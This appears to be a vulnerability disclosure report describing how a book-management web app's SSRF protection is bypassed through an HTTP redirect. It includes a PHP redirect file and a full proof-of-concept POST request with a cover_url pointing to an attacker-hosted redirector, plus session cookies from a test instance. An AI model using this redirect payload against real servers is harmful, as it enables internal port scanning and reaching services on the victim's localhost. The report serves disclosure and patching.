Description

The SSRF Protection is incomplete and can be bypassed via an HTTP redirect, the python-requests library will follow redirections by default (can be disabled byallow_redirects=False).
An attacker can set up their HTTP server to respond with a 302 redirect to redirect the request to localhost.

Sample PHP file to reproduce :

//redir.php
<?php

header("Location: http://localhost:9000");

?>

Proof of Concept

POST /admin/book/1 HTTP/1.1
Host: 127.0.0.1:8083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------14432334242120559709379867589
Content-Length: 2321
Origin: null
Connection: close
Cookie: session=.eJwljjlqBDEQAP-i2EEf6lZrPzNIfWBjsGFmNzL-uwccVlFB_bSjzrze2-N5vvKtHR_RHs0qZjJR96yaZUwgy0EsCrqJgS60QSTLhDcPBhZzWdRhqMZcIIjqmLHhLntpem1RFew8dUpX9MQ50Rg3aFQAWxF57lyc7R55XXn-3-CNfp11PL8_8-sWPty3EoGbB2YOhF41KPfOSBq9gpRitt8_T24_Fw.YhhiGw.-3BW6pW_7-ch1-BZOwoScsgrPTY; remember_token=1|c03586bceafcfcc3553cf6f7687a8e5568f28f153173472c83b178b3c748a61ffb39953601a75eb9dcc9c91a8fcd3a710feecab8e93530f1781b5734183b391e
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="csrf_token"

ImM3Y2NiNjIyMGM4Y2QxZWU3MTA0ZmY3MmViYmVkZTI3NGZkMjYyZDki.YhhiGg.MmwyZBGR24IaeVpO-gVRdjx2vk0
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="book_title"

A Christmas Carol in Prose; Being a Ghost Story of Christmas
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="author_name"

Charles Dickens
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="description"

<p>Test</p>
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="tags"

Christmas stories, Ghost stories, London (England) -- Fiction, Misers -- Fiction, Poor families -- Fiction, Scrooge; Ebenezer (Fictitious character) -- Fiction, Sick children -- Fiction
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="series"


-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="series_index"

1.0
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="rating"


-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="cover_url"

http://192.168.1.130:8080/redir.php
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="btn-upload-cover"; filename=""
Content-Type: application/octet-stream


-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="pubdate"

2004-08-11
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="publisher"


-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="languages"

English
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="btn-upload-format"; filename=""
Content-Type: application/octet-stream


-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="detail_view"

on
-----------------------------14432334242120559709379867589--

Impact

This vulnerability is capable of port scanning and even may execute some actions on the victim’s side in case there are sensitive services on localhost.

Patch

I recommend using the Advocate library instead of requests, it will protect functionality download the remote files from SSRF attacks.